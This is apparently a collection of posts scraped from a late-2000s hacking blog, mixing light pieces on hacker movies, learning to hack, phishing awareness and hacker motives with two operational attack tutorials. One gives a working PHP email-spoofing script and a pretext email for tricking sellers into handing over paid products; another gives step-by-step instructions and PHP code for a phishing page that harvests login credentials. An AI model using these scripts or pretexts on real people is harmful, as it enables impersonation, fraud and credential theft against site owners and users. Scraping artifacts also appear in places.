Many of you know about my new project, the HackerInstitute.com. Well, I just want you all to know that I just released an Ethical Hacking module straight from the Hacker Institute for.. wait for it.. free! Wooot!

Come get get it @ www.HackerInstitute.com.

Oh, and if you like it, you can sign up for the Hacker Institute because I’ve also re-opened registration. Yay! This day is getting better by the second!

Once again, here’s a link to the site: http://www.HackerInstitute.com

Everybody loves free stuff. But is it possible to get non-free items free on the internet? Of Course! Through Social Engineering and E-Mail Spoofing you can, and I will show you how with an example to back me up. By reading the rest of this post you are agreeing to our DISCLAIMER. Doing this is Illegal, so don’t do it. It’s just an interesting scenario to read about.

First I will show you the process step-by-step, then I will post my real life example that successfully worked out for me.

1. Find a website selling a digital product(s) online.
2. Find the website’s main E-Mail address, product creators name and write them down.
3. Locate a well-known high-ranking website that is based on the niche of the product.
4. On this website, find their main E-Mail address. Must be a “@that-sites-name.com” E-Mail. If they have multiple go for the one that has to do with advertising or partnerships. Along with the E-Mail address, get the site owner’s name or the name of whoever takes care of advertising and partnerships. Write them down.
5. Create a new E-Mail address (Gmail) with the popular sites owner’s name in it. This will be used as the site owner’s personal E-Mail. Or so they think.
6. Now it’s time to write up a believable E-Mail. In the E-Mail, talk about how your company/website (the popular one you chose) is looking to make partnerships and affiliate with products like theirs (the item you want to receive). Then state that before you would like to continue with the partnership, you would like to get a copy of the product to review it to decide whether you would like to continue with the partnership. If the website you are pretending to be is a large and well known, the product owner will realize that he/she could make a lot of money with you, and will send you a copy of the product without hesitation. (See example below)
7. Now it’s time to send the E-Mail. We will be using the PHP script I wrote below to spoof the E-Mail and make it look like it came from a trusted source (the popular website).
8. I would highly suggest running the script off your own computer using Wamp (Windows) or Mamp (Mac) with an SMTP server. If you don’t know how to do this, sign up for the E-mail list on the right and you can see a video on it. If your ISP doesn’t allow you send your own E-Mails, then upload it to a webserver that supports PHP and the PHP mail() function. If you decide to use a online hosting service, there will be a higher chance that the E-Mail sent will be flagged as spam.
9. Run this script and you should see the following form: http://www.MrCracker.com/form/mail.php Don’t try to use it. It’s disabled.
10. Fill in the spoofed E-Mail. This is the E-Mail of the E-Mail you are spoofing, in other words, the E-Mail that you are impersonating. (The popular site’s E-Mail)
11. Fill in the target’s E-Mail, the product owner’s E-Mail.
12. Fill in the reply E-Mail. This is the E-Mail that you created to be used as the site owner’s E-mail. When the target hits reply, the E-Mail will be sent to this E-mail.
13. Keep the message title short.
14. Now fill in the actual message. Make sure to format the message with HTML otherwise it’ll be sent without line spaces. To add a line break use the HTML command <br />.
15. Before you send the E-Mail, first send it to your own E-Mail to see how it looks like. Once everything is correct, you can send it off to the actual product owner.
16. Now wait, and hopefully you will get a reply with a download link or attachment.

The E-Mail spoofer PHP script:

<?php
/*

E-Mail Spoofer
MrCracker.com

*/

if($_POST['submit']){ //if submit is hit continue...

$spoof = (stripslashes(trim($_POST['spoof']))); //sanitizes all the user input.
$target = (stripslashes(trim($_POST['target'])));
$reply =  (stripslashes(trim($_POST['reply'])));
$title = str_replace(array("n", "r"), '', stripslashes(trim($_POST['title'])));
$body  = (stripslashes(trim($_POST['body'])));

$headers  = "From: $spoofrn";
$headers .= "Reply-To: $replyrn";
$headers .= 'MIME-Version: 1.0' . "n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "rn";

$regex="/^[a-zA-Z][w .-]+[a-zA-Z0-9]@([a-zA-Z0-9][a-zA-Z0-9-]*.)+[a-zA-Z]{2,4}$/"; //Compares input email to this pattern to make sure it is a valid email.
if($spoof == "" || !preg_match($regex, $spoof)){

echo "<font color='red'><b> Error: No Spoof Email Provided or Email Invalid!
</font></b>"; //error checking
exit;
}
elseif($target == "" || !preg_match($regex, $target)){
echo "<font color='red'><b> Error: No Target Email Provided or Email Invalid!
</font></b>";
exit;
}
elseif($reply == ""){
echo "<font color='red'><b> Error: No Reply Email Provided! </font></b>";
exit;
}
elseif($title == ""){
echo "<font color='red'><b> Error: No Email Title Provided! </font></b>";
exit;
}
elseif($body == ""){
echo "<font color='red'><b> Error: No Email Body Provided! </font></b>";
exit;
}
else{
mail($target, $title, $body, $headers); //if there are no errors, send the email
echo "Mail Was Sent!";
}
}
else{ //if submit wasn't hit, show the HTML form
?>
<!-- This is the CSS which makes the form look the way it does. -->
<html>
<body>
<style type="text/css">
body {
font-family: Arial;
font-size: .9em;
}
input {
background: #ECFDCE;
border: 1px solid green;
}
textarea {
background: #ECFDCE;
border: 1px solid green;
}
legend {
border: 1px solid #048DB4;
background: #F0F8FF;
}

fieldset {
border: 1px solid #048DB4;
width: 18.7em;
padding-left: 11px;
padding-bottom: 20px;
background: #F0F8FF;
}
<!-- This is the HTML form -->
</style>
<fieldset>
<legend>Email Spoofer</legend>
<form action="" method="POST">
Spoofed Email:<br>
<input type="text" size="40" name="spoof"><br>
Targets Email:<br>
<input type="text" size="40" name="target"><br>
Reply Email:<br>
<input type="text" size="40" name="reply"><br>
Message Title:<br>
<input type="text"size="40" name="title"><br>
Message Body:<br>
<textarea rows="10" cols="30" name="body">
</textarea><br>
<input type="submit" value="Submit" name="submit">
<input type="reset" value="Clear">
</form>
</fieldset>
</body>
</html>
<?php
}
?>
</pre>

In the example, I will show you how I used this on someone I know to see if it worked. As you will see, I will not be naming the specific websites or people.

Spoofed Email: advertising@big-sample-site.com

Target Email: Name@product-site.com

Reply To: Site-Big-Owners-Name@Gmail.com

Message Title: Product Name Partnership

Message Body: Hello Product-Owner-Name,

Big-Sample-Site.com is looking to make some new affiliations to raise funding and your “Product Name” has caught our attention. We only consider serious and professional products. Before we consider anything else, would you be willing to send us a copy of your product so that we may review it and decide whether we would still like to pursue this partnership.<br /><br />

If you are interested, please reply to this E-Mail as soon as possible. <br /><br />

-Name <br />

Big-Sample-Website.com <br />

Notice how I added <br /> into the message. This is important so that line breaks are created. If they aren’t added, the whole message will be received in one giant paragraph and won’t look professional.

The next day, I had the product in my E-Mail, and I notified my friend about this kind of attack.

Note: This is a shot or miss thing. Some people will get suspicious and send the actual product to the original E-Mail isntead of the changed reply E-Mail address. Sometimes people will fall for regular free E-Mail address. If you use a free E-Mail address, you won’t have to spoof the E-Mail and risk have it sent to spam, or having the target reply to the wrong E-Mail, so that’s also worth a try.”"

We’ve all seen the ridiculous attempts made by hollywood to try and portray hacker’s realisticly in their movies. And as I’m sure all of you have concluded, they absolutely….FAIL. For those of you who havn’t seen any, follow this link to see a full list of movies. Some of these will be totally absurd to those of you who know hacking while others will be somewhat realistic.

1. Get lots of computer screens and stack them up to create a sort of shell around you. What you would use them for, I don’t know, but you need them.

2. Type at ridiculous speeds, pressing multiple keys at the same time, and take a while at that same speed to type up short few lettered words.

3. Never use your mouse. Do all your hacking via the keyboard. Once you have gotten through all the “firewalls” and other junk, pause, pick up your pointer finger and slowly drop it on the <ENTER> key,  sit back and…

4. Watch the giant progress bar slowly reach 100% and flash COMPLETED or HACKED to mark the completion of your hacking job.

5. You must be able to break into any computer or government server in ten minutes.

6. The one password you can’t easily get through is going to be the victims birthday or daughters name. You must guess it, and get it correct the second or third attempt.

7. You must create and send a virus that will flash “VIRUS” on the victims server and cause the servers to have mini explosions.

8. Always talk about “firewalls” and “modifying a certain code”.

9. During the hacking process, at some point, you must have random 1′s and 0′s scrolling down your whole screen, or instead of the 1′s and 0′s have random HTML code streaming down your whole screen because you can hack via HTML… right?

If you can think of some more, TELL ME!, so I can add ‘em in.”"

I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.

1. Select a target website and navigate to their login page.
2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
4. Create a PHP file and name it “phish.php”.
5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.

   <?php
   Header("Location: http://www.RealSite.com");
   
   $handle = fopen("list.txt", "a");
   
   foreach($_GET as $variable => $value) {
   
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
   }fwrite($handle, "\r\n");
   
   fclose($handle);
   exit;
   ?>

   6.  Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL.  The HTML code should start with something like this: <form action =”sitelinkhere.com” method=”GET” >

   7.  Once everything is complete, upload the files to a free webhost that supports PHP.
   8.  That’s it! You’ve just created a phishing page.

   UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

If you would like a more in depth explanation that includes many pictures and specific examples, I’d reccomend obtaining The Hacker’s Underground Handbook.

How to hack. It’s a very often asked question with around 1,000,000 Google searches each month. I know that anyone that runs a hacking related website get’s asked this question daily. After searching the internet for a decent answer to this question, I found none, so I decided to answer it on my own once and for all.

How do I learn how to hack? What does it take to become a hacker?

So many people that would like to learn how to hack have an absolutely wrong mindset. They think there’s some simple secret to learning how to hack. Learning how to hack isn’t as simple as looking through some site HTML source code. For those of you that have had this mindset, drop it now, it will get you absolutely no where.

Learning how to hack will be much easier with a few qualities:

Patience - Learning how to hack will take time. If you aren’t a patient person, it’s most likely not something you should get into. I started learning how to hack a few years ago. Within those few years, I  gained a lot of knowledge, but I’m still learning. There will always be something else, something new to learn. The sky is the limit.

Curiosity - Curiosity plays a major role in learning how to hack. Curiosity will be one of the main forces that will push you to keep going, keep learning, and not giving up when something difficult arises.

Creativity - When attempting to hack something, many problems or challenges may arise that require more than just logic. Being creative and learning to think outside the box will be very helpful.

Dedication - If you are going to start to learn how to hack, don’t stop. From experience, I can tell you that if you are going to start learning how to hack, you must dedicate at least a couple days of the week to it. If you decide to take big breaks, you will forget information, and this will force you to start relearning that information to understand the more advanced topics that come up later on.

Hacking is a broad subject with many different categories. If you are going to start to learn how to hack, start with picking a category and a subject in that category. When I first began learning how to hack, I wanted to know EVERYTHING. For the first couple months a skipped from subject to subject, reading bits and pieces about everything. After a couple months, I realized that I knew just enough in most subjects to explain their basic concepts, but I couldn’t apply them to real world situations or execute the knowledge in any way whatsoever. I had wasted the time I could have spent mastering a certain topic.

Once you begin learning how to hack, you will notice that there are a vast amount of useful programs out there. Before you begin to use these programs, learn how they work and why they work. You aren’t a hacker if you just use point and click programs to do all the work for you. Learning how these programs work will open up many new doors. Ask yourself questions like these, why did this do what it did? What allowed it to do what it did? What’s going on in the background when I run this? How was this possible? Once you have an understanding of how and why things work and why things happen the way they do, you will be able to come up with new hacking methods and theories that could eventually end up in new technologies and vulnerabilities.

When learning how to hack, research the topic you are learning on your own. No one is going to do all the work for you. What do you think is the difference between the smartest most accomplished hackers and the people who are constantly asking dumb questions like “How do I hack hotmail!”? While the so-called hacker’s waste their time asking dumb questions and waiting for responses with easy solutions from someone else, the smart hackers are doing their own research and learning everything they can on their own. Of course occasionally everyone will needs some guidance, but not for every little thing. Also when you do your own research, you will learn 10 times more than if you were to get an answer from someone else. Remember, Google is your friend!

Eventually, you should definitely learn how to program. By learning how to program, you will be able to do so much more as a hacker. Programming creates endless opportunities. You will be able to fully understand how and why programs work; you will be able to understand how exploits work and how to create your own. With the ability to program, you will be able to understand and learn the most advanced topics of hacking.

Don’t limit yourself to one operating system. Learn Linux. Linux is used to run millions of servers on the net, so it is important to know how Linux works. Also, many of the best hacking programs are made exclusively for the Linux operating system.

One of the best methods to learning how to hack is to read books. There are many great professional books about all the aspects of hacking. A simple search of “hacking” on Amazon.com will bring up a huge list of awesome books.

Besides just reading books, you should join hacking community websites. It is important to be part of a community that is full of hackers of all skill levels. This is good for when you need help or when you wish to develop your skills by starting hacking related projects with other likeminded people. Also, interacting with other hackers will motivate you to keep learning.

Subscribing to hacking related blogs (like MrCracker.com) and podcasts is another great way to learn new things and stay up to date with the hacking scene news. Google reader is a great feed reader. You can start by subscribing to MrCracker.com by clicking here. Other  great resources are E-Mail lists. There are many E-Mail lists out there that send out weekly vulnerability reports or just newsletters. You can start by subscribing to the MrCracker.com E-Mail list on the right.

The best way to learn something and to remember it is by actually doing something with it! For example, after every time you learn something new, take that new knowledge and create a program related to it, write a tutorial about it or create a video about it for others to learn. This way, the information will stick and not become forgotten within a week.

Now that you know what it takes to become a hacker, and if you still think it’s for you, then… Start Learning! If you’d like a head start, I recommend getting The Hacker’s Underground Handbook.

What do you think? Did I miss something? I’d like to hear you opinions so please comment below .”"

So, what is phishing? In a nutshell, phishing is the act of stealing one’s personal information by pretending to be a legitimate and trustworthy entity. Most commonly the target websites are E-Mail services and E-Commerce websites. According to www.phishtank.com,  in the month of December, 2008 the top targets for phishing attacks were:

Phishing attacks are most commonly executed through E-Mails. The E-Mails look like they come from trusted sources and ask for personal information like usernames, passwords, credit card numbers, and social security numbers.

To avoid falling for phishing attacks, never go to important websites through links in E-Mails. Also, when logging into a website like Yahoo.com, look at the site URL and make sure it says www.yahoo.com  or a subdomain like login.yahoo.com. If it doesn’t, you know that it is a fake.  For more information on avoiding phishing scams see antiphishing.org.

To learn how phishing sites are created and executed, see the Hacker’s Underground Handbook.”"

For those of you that don’t know about Hackin9 – IT Security Magazine , they are giving away their 6/2008 issue for free in return for signing up for their mailing list. You better go get it now because the offer is only valid from now until Feb 3, 2009.

Now, you can check Hakin9 magazine and download a free copy of the 6/2008 issue of Hard Core IT Security magazine. It’s 84 pages, 10.5MB, and requires you to provide an email address. In order to download the free article, please, sign up for hakin9 Newsletter. Hakin9 issue includes articles on Registry Analysis by Harlan Carvey, Client-side Exploits by Anushree Reddy, Simple WiFi Hacking with Eee Pc by Marco Lisci and many more. Register to download your free copy.
Best regards,
Hakin9 team

Source: http://hakin9.org/prt/view/pdf-articles.html

“”

I constantly get emails of people asking me how to hack hotmail, hack yahoo, and all the other popular email services. Usually it’s for one of the following moronic cover-ups: It’s my password, I just forgot it. , or my boyfriend this or my girlfriend that. I just don’t understand what possesses them to possibly think that I give a hoot.  Nah, I love you guys, I’m just kidding! Everyone seems to think that there’s some hacking trick that will magically get them the password. Too bad you have to actually learn something. Bummer… eh? Below I have briefly described the most common methods.

Phishing - Phishing is by far the most used and easiest method. The attacker simply sets up a page that looks exactly like the real email login page and tricks people into entering their login information.
Update: Check out the new post on how to create your own phishing page here.

Malware - Attackers can infect computers with malware such as Trojan horses that could extract all the saved passwords on a computer or a key logger that will log all the victims typed passwords.

Guessing - The attacker could literally guess the password if the victim uses an easy password like his/her name, birthday, favorite something, pets name, or something similar. If the attacker knows the victim well enough this attack won’t be that difficult to carry out.

Social Engineering - The attacker could literally ask for your password by calling up the victim and pretending to be an IT employee of the company. Once the victims trust is gained, the attacker would then make up a story saying something like the victims password is needed to do some updates because the user database is down or some other bogus. The attacker could also use social engineering along with a phishing page. This would be done by sending the victim a n email that looks like it is from the real email provider. In the email would be a link to his phishing page telling the victim that he/she needs to login and update or change some information immediately for whatever reason.

If you would like to see in detail how to excecute every one of these methods, see The Hacker’s Underground Handbook.“”

Today, there are hundreds of hacking/security related blogs out there. Out of those, only a select few end up being updated regularly with good content. I am currently subscribed to a few and so should you. Hey that rhymes! Here’s the list in no specific order.

www.darknet.org.uk – darknet is mainly about exposing the latest and greatest security tools.

www.ha.ckers.org – ha.ckers.org is a great blog mainly about web application security.

www.schneier.com – run by security guru Bruce Schneier and covers all aspects of security from physical to electronic.

blogs.hackerscenter.com – informative security blog that is contributed to by multiple people of great intelligence.

www.gnucitizen.com – educates and shares information on best practices, tools and techniques of security.

www.astalavista.com – contains many interesting interviews.

www.securiteam.com – security professionals share their thoughts, musings, information, research, and news

]]>”"

Have you ever visited one of your favorite websites to find it defaced by some hacker named “C0mpHugg3r”? Maybe the fact that this hacker kept your from being able to watch the next episode of Gossip Girl, or help kill some time at work by playing flash games, made you extremely mad causing you to throw your freshly brewed cup of moonshine against a wall, accidently clipping your co-worker and causing him to fall off the cliff he was standing by. Then while you were being escorted to jail you might have asked yourself, why would someone do this!? Why can’t they just get a life!? Seriously! What do they possibly get from hacking that innocent website?! Ugh! Well I asked myself these same questions and came up with this list…

Revenge – If someone was humiliated, had their pride hurt, insulted, fired, or anything else you could think of may get the desire to get some sweet revenge. They would do almost anything possible to succeed and get their urge for revenge satisfied. Most of the time, it’s an employee who thinks they were fired for an unjust reason.

A HACKER who allegedly caused millions of dollars worth of damage to Northern Territory government computers wanted revenge for his boss making him the “newbie” at work and giving him a bad office seat, a court has been told.

http://www.australianit.news.com.au/story/0,24897,24474552-15306,00.html

Money, Greed – Due to the greed for material things, hackers may empty banks of their money or rent out their giant list of zombie computers to underground criminal organizations. These criminals use the compromised machines to send out millions of spam messages to you and me. Eventually they hope to find someone foolish enough to send them money in hopes of getting the millions of dollars they inherited from King Zimbahalamazaki of Nigeria.

An Oregon woman who is out $400,000 after falling for a well-known Internet scam says she wasn’t a sucker or an easy mark.

http://www.foxnews.com/story/0,2933,453125,00.html

Curiosity – Many hackers are driven by curiosity. They need to know what the hidden bytes hold within the target’s server. They don’t like the fact that information is being hidden from them.

David Kernell, the 20-year-old Tennessee student who has been under suspicion for allegedly obtaining unauthorized access into Alaska Gov. Sarah Palin’s private Yahoo e-mail account, has been indicted by a federal grand jury in Tennessee.

http://blog.wired.com/27bstroke6/2008/10/tennessee-stude.html

Boredom – Many people turn to hacking because they are bored with their regular structured life or just bored in general.

It seems that mugging people on the street isn’t good enough for the youth of today. Instead they are increasingly turning to hacking and technology-related crime for both their kicks and to make some money. However, some are so bad at it, or brag about their endeavors so readily that they get caught easily.

http://tech.blorge.com/Structure:%20/2008/10/28/bored-of-mugging-teenagers-turn-to-hacking/

Fame, feeling of significance - Many hackers hack for the fame and to boost their ego. Most of the time, these hacker don’t get this in real life. They end up turning to the computer where people don’t judge them by their looks, physical abilities, or social standing. Defacements are usually made because the hacker wishes to get attention and fame.

Nationalism – due to people’s loyalty and devotion to their country, nationalism is a large reason why many people hack. During war, cyber-warfare between the two countries is very common. Hacking for political or social motivated purposes is also known as hacktivism.

THE FBI has claimed that hackers who penetrated the White House security network and carried out sophisticated attacks on Barack Obama and John McCain’s campaign network came from China.

http://www.theinquirer.net/gb/inquirer/news/2008/11/10/apple-smartphone-number-two

As you can see there are many different reasons why people are driven to hack. If you believe I missed some, feel free to add them in the comments.]]>”"